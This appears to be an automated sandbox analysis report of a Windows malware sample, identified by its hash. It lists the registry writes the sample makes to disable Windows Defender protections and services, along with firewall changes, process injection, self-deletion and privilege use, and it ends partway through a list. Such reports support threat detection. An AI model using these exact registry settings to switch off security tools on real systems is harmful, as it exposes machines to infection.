13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe

Modifies Windows Defender notification settings 3 TTPs 4 IoCs

evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe

Modifies security service 2 TTPs 4 IoCs

evasion

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"	reg.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
2716	netsh.exe
2956	netsh.exe

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/memory/1980-1094-0x0000000074F90000-0x0000000074F99000-memory.dmp	acprotect
behavioral1/files/0x0007000000019629-1100.dat	acprotect

Deletes itself 1 IoCs

pid	Process
2712	explorer.exe

Executes dropped EXE 62 IoCs

pid	Process
2636	dotNetFx40_Full_setup.exe
1640	Setup.exe
2092	dotNetFx45_Full_setup.exe
1996	Setup.exe
3000	SetACL64.exe
2800	SetACL64.exe
2732	SetACL64.exe
2684	SetACL64.exe
2756	SetACL64.exe
3064	SetACL64.exe
2752	SetACL64.exe
2796	SetACL64.exe
3068	PowerRun64.exe
2316	PowerRun64.exe
2208	PowerRun64.exe
676	PowerRun64.exe
2172	PowerRun64.exe
1188	PowerRun64.exe
1012	PowerRun64.exe
2136	PowerRun64.exe
3016	PowerRun64.exe
2952	PowerRun64.exe
2376	PowerRun64.exe
2664	PowerRun64.exe
2636	PowerRun64.exe
2772	PowerRun64.exe
2356	PowerRun64.exe
912	PowerRun64.exe
108	PowerRun64.exe
1516	PowerRun64.exe
1736	PowerRun64.exe
2004	PowerRun64.exe
2384	PowerRun64.exe
1104	PowerRun64.exe
952	PowerRun64.exe
900	PowerRun64.exe
1684	PowerRun64.exe
1728	PowerRun64.exe
2184	PowerRun64.exe
1464	PowerRun64.exe
2480	PowerRun64.exe
1000	PowerRun64.exe
2264	PowerRun64.exe
2680	PowerRun64.exe
2696	PowerRun64.exe
2588	PowerRun64.exe
2136	PowerRun64.exe
1852	PowerRun64.exe
1700	PowerRun64.exe
2352	PowerRun64.exe
2772	PowerRun64.exe
2604	PowerRun64.exe
1224	PowerRun64.exe
1704	PowerRun64.exe
2392	PowerRun64.exe
2964	PowerRun64.exe
2296	PowerRun64.exe
1604	PowerRun64.exe
708	PowerRun64.exe
1104	PowerRun64.exe
2896	acxxtzcogvgr.exe
2068	win_version_csharp.exe

Loads dropped DLL 44 IoCs

pid	Process
1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
2636	dotNetFx40_Full_setup.exe
1640	Setup.exe
1640	Setup.exe
1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
2092	dotNetFx45_Full_setup.exe
1996	Setup.exe
1996	Setup.exe
1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
2952	cmd.exe
1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
2772	cmd.exe
2772	cmd.exe
2772	cmd.exe
2772	cmd.exe
2772	cmd.exe
2772	cmd.exe
2772	cmd.exe
1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
1864	cmd.exe
836	Process not Found
1864	cmd.exe
1864	cmd.exe
1864	cmd.exe
1864	cmd.exe
1864	cmd.exe
1864	cmd.exe
1864	cmd.exe
1864	cmd.exe
1864	cmd.exe
1864	cmd.exe
1864	cmd.exe
1864	cmd.exe
1864	cmd.exe
1864	cmd.exe
1864	cmd.exe
1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Signature Updates	SetACL64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Signature Updates	SetACL64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\UX Configuration	SetACL64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\UX Configuration	SetACL64.exe

Modifies Security services 2 TTPs 10 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

persistence privilege_escalation

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1980 set thread context of 2712	1980	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe	220

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1980-1094-0x0000000074F90000-0x0000000074F99000-memory.dmp	upx
behavioral1/files/0x0007000000019629-1100.dat	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Logs\CBS\CbsPersist_20241204135721.cab	makecab.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
788	powershell.exe
596	powershell.exe
1512	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dotNetFx45_Full_setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	acxxtzcogvgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dotNetFx40_Full_setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	win_version_csharp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Setup.exe

Modifies data under HKEY_USERS 48 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1640	Setup.exe
1640	Setup.exe
1640	Setup.exe
1640	Setup.exe
1996	Setup.exe
1996	Setup.exe
1996	Setup.exe
1996	Setup.exe
3068	PowerRun64.exe
3068	PowerRun64.exe
2208	PowerRun64.exe
2208	PowerRun64.exe
2316	PowerRun64.exe
2316	PowerRun64.exe
676	PowerRun64.exe
676	PowerRun64.exe
2172	PowerRun64.exe
2172	PowerRun64.exe
2136	PowerRun64.exe
2136	PowerRun64.exe
2952	PowerRun64.exe
2952	PowerRun64.exe
2376	PowerRun64.exe
2376	PowerRun64.exe
2664	PowerRun64.exe
2664	PowerRun64.exe
2772	PowerRun64.exe
2772	PowerRun64.exe
912	PowerRun64.exe
912	PowerRun64.exe
108	PowerRun64.exe
108	PowerRun64.exe
1736	PowerRun64.exe
1736	PowerRun64.exe
2004	PowerRun64.exe
2004	PowerRun64.exe
1104	PowerRun64.exe
1104	PowerRun64.exe
952	PowerRun64.exe
952	PowerRun64.exe
1684	PowerRun64.exe
1684	PowerRun64.exe
1728	PowerRun64.exe
1728	PowerRun64.exe
1464	PowerRun64.exe
1464	PowerRun64.exe
1000	PowerRun64.exe
1000	PowerRun64.exe
2480	PowerRun64.exe
2480	PowerRun64.exe
2264	PowerRun64.exe
2264	PowerRun64.exe
2588	PowerRun64.exe
2588	PowerRun64.exe
2136	PowerRun64.exe
2136	PowerRun64.exe
1700	PowerRun64.exe
1700	PowerRun64.exe
2352	PowerRun64.exe
2352	PowerRun64.exe
2604	PowerRun64.exe
2604	PowerRun64.exe
1224	PowerRun64.exe
1704	PowerRun64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeBackupPrivilege	3000	SetACL64.exe
Token: SeRestorePrivilege	3000	SetACL64.exe
Token: SeTakeOwnershipPrivilege	3000	SetACL64.exe
Token: SeBackupPrivilege	2800	SetACL64.exe
Token: SeRestorePrivilege	2800	SetACL64.exe
Token: SeTakeOwnershipPrivilege	2800	SetACL64.exe
Token: SeBackupPrivilege	2732	SetACL64.exe
Token: SeRestorePrivilege	2732	SetACL64.exe
Token: SeTakeOwnershipPrivilege	2732	SetACL64.exe
Token: SeBackupPrivilege	2684	SetACL64.exe
Token: SeRestorePrivilege	2684	SetACL64.exe
Token: SeTakeOwnershipPrivilege	2684	SetACL64.exe
Token: SeBackupPrivilege	2756	SetACL64.exe
Token: SeRestorePrivilege	2756	SetACL64.exe
Token: SeTakeOwnershipPrivilege	2756	SetACL64.exe
Token: SeBackupPrivilege	3064	SetACL64.exe
Token: SeRestorePrivilege	3064	SetACL64.exe
Token: SeTakeOwnershipPrivilege	3064	SetACL64.exe
Token: SeBackupPrivilege	2752	SetACL64.exe
Token: SeRestorePrivilege	2752	SetACL64.exe
Token: SeTakeOwnershipPrivilege	2752	SetACL64.exe
Token: SeBackupPrivilege	2796	SetACL64.exe
Token: SeRestorePrivilege	2796	SetACL64.exe
Token: SeTakeOwnershipPrivilege	2796	SetACL64.exe
Token: SeDebugPrivilege	3068	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	3068	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	3068	PowerRun64.exe
Token: 0	3068	PowerRun64.exe
Token: SeDebugPrivilege	2316	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2316	PowerRun64.exe
Token: SeDebugPrivilege	2208	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2316	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2208	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2208	PowerRun64.exe
Token: 0	2208	PowerRun64.exe
Token: SeDebugPrivilege	676	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	676	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	676	PowerRun64.exe
Token: SeDebugPrivilege	2172	PowerRun64.exe
